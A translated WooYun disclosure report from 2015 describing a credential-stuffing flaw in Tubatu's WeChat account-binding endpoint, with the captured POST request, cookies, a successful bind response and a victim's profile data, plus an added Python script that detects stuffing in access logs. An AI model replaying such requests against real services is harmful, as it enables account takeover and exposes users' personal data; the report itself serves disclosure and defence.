
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0141492

Title: A Tubatu (to8to) endpoint allows credential stuffing to bind other people's accounts, leaking user information

Vendor: 土巴兔装修网 (Tubatu home-renovation site)

Author: 路人甲

Submitted: 2015-09-16 23:33

Fixed: 2015-11-01 09:18

Published: 2015-11-01 09:18

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-16: Details sent to the vendor; awaiting vendor handling
2015-09-17: Vendor confirmed; details visible to the vendor only
2015-09-27: Details opened to core white hats and domain experts
2015-10-07: Details opened to regular white hats
2015-10-17: Details opened to intern white hats
2015-11-01: Details opened to the public

Brief description:

Detailed description:

Tubatu WeChat client (m.to8to.com). The captured account-binding request is as follows:

POST /ownerCenter/bindCompany/id/ZTQ4Zmx1b3JHSmZ1WWZQU3oyOGE3NjhFa01SVnk3WHlsejk2TkNkcTFOSzZqTnQxZjFQaHBldTFUeDIycVZUMTVEbzBteEV3WEJJY04xRnRQNUk0dVFPdW5QWFEwVDVPcFluYWQxTXVnNGlUaGxiVlJwZw%3D%3D/rand/9941 HTTP/1.1
Host: m.to8to.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://m.to8to.com/ownerCenter/bind/type/3?code=031e47f29807f85c7751797337f9d93J&state=hoeven
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: PHPSESSID=msadan7ieo7jfjne1mvbng7255; Hm_lpvt_dbdd94468cf0ef471455c47f380f58d2=1442367509; Hm_lvt_dbdd94468cf0ef471455c47f380f58d2=1442358516,1442367267; to8to_cook=OkOcClPzRWV8ZFJlCIF4Ag==; to8to_landpage=http%3A//m.to8to.com/ownerCenter/index/%3Fcode%3D021a099ee677577ca53bc3dcc00871cN%26state%3Dhoeven; to8to_landtime=1442358515; to8to_nowpage=http%253A%252F%252Fm.to8to.com%252FownerCenter%252Fbind%252Ftype%252F3%253Fcode%253D031e47f29807f85c7751797337f9d93J%2526state%253Dhoeven; to8to_sourcepage=; to8to_tcode=sz; to8to_tname=%E6%B7%B1%E5%9C%B3; to8to_townid=1130; to8tocookieid=f313e2a500ff0527e5b82f0983fc65aa342656; uid=wKgCulX4pO2hZwqGC2KIAg==
Content-Length: 27
Origin: http://m.to8to.com
Accept-Encoding: gzip, deflate
name=aaa&password=123456


Running credential stuffing against the name/password parameters of this request (see the image below):

[Figure: 1.jpg]


{"msg":"绑定成功","code":"200","type":1,"cid":"119813","url":"https:\/\/open.weixin.qq.com\/connect\/oauth2\/authorize?appid=wx23b5153a96c64877&redirect_uri=http%3A%2F%2Fm.to8to.com%2FownerCenter%2Findex%2F&response_type=code&scope=snsapi_userinfo&state=hoeven#wechat_redirect"}


Then log in and take a look:

{"version":"2.5","action":"UserDetailAction","errorCode":0,"allRows":0,"data":{"uid":119813,"username":"xuyong","indentity":"0","goodlevel":"0","isactive":"0","nick":"xuyong","regdate":"1273493602","email":"","oldemail":"[email protected]","name_rz":"0","subdomain":"xuyong","credits":"6","cost_credits":"0","mobiles":"","regsource":"1","province":"","city":"","avatar":"","liveid":"2663921","style":[{"typeId":15,"value":"\u73b0\u4ee3"}],"house_type":7,"house_type_name":"\u4e00\u5c45","area":0,"type_id":0,"type_name":"","company_id":"","company_name":"","needupdate":1,"community_id":"","community_name":"","hasname":0,"sign":0,"progress_id":1,"newmessage":0,"projectNum":0,"projectId":0}}
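As an added example (not part of the report or the vendor's code), defender-side detection of the pattern shown above: flag any client that submits many distinct `name` values to the bind endpoint within a short window, which is what a credential-stuffing run against an unprotected binding flow looks like in access logs. The log format, thresholds and sample lines are constructed.

```python
# Added example (not from the report): detect credential stuffing against an
# account-binding endpoint by counting distinct usernames tried per client
# within a sliding time window. Log format and sample lines are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<iso-timestamp> <client> POST <path> name=<user> status=<code>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) POST (?P<path>/ownerCenter/bindCompany\S*) '
    r'name=(?P<name>[^&\s]+) status=(?P<status>\d+)$'
)

# Constructed sample: 10.0.0.5 cycles through six usernames in six seconds
# (401 = bind rejected, 200 = bind accepted); 10.0.0.9 is an ordinary user.
SAMPLE_LOG = """\
2015-09-16T10:00:01 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/1 name=aaa status=401
2015-09-16T10:00:02 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/2 name=bbb status=401
2015-09-16T10:00:03 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/3 name=ccc status=401
2015-09-16T10:00:04 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/4 name=ddd status=401
2015-09-16T10:00:05 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/5 name=eee status=401
2015-09-16T10:00:06 10.0.0.5 POST /ownerCenter/bindCompany/id/X/rand/6 name=fff status=200
2015-09-16T10:00:07 10.0.0.9 POST /ownerCenter/bindCompany/id/Y/rand/7 name=owner1 status=200
2015-09-16T10:30:00 10.0.0.9 POST /ownerCenter/bindCompany/id/Y/rand/8 name=owner1 status=401
"""

def parse(log):
    """Yield (timestamp, client, username, status) for each bind request."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["client"], m["name"], int(m["status"])

def detect_stuffing(log, window=timedelta(minutes=5), max_names=5):
    """Return {client: usernames} for clients that tried more than max_names
    distinct usernames on the bind endpoint inside any window-sized interval."""
    events = defaultdict(list)
    for ts, client, name, _status in parse(log):
        events[client].append((ts, name))
    flagged = {}
    for client, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the interval fits inside `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            names = {n for _, n in evs[start:end + 1]}
            if len(names) > max_names:
                flagged[client] = names
                break
    return flagged
```

A client that is flagged here should also have its bind successes reviewed, since a 200 response following a burst of rejected names means a foreign account was attached to the attacker's session.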

Proof of vulnerability:

You can log in via the WeChat client, the app and so on; I won't attach screenshots.

Fix recommendation:

Improve the mechanism.

Copyright notice: please credit 路人甲@乌云 when reproducing.


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-09-17 09:17

Vendor reply:

Thanks for the feedback.

Latest status:

None yet.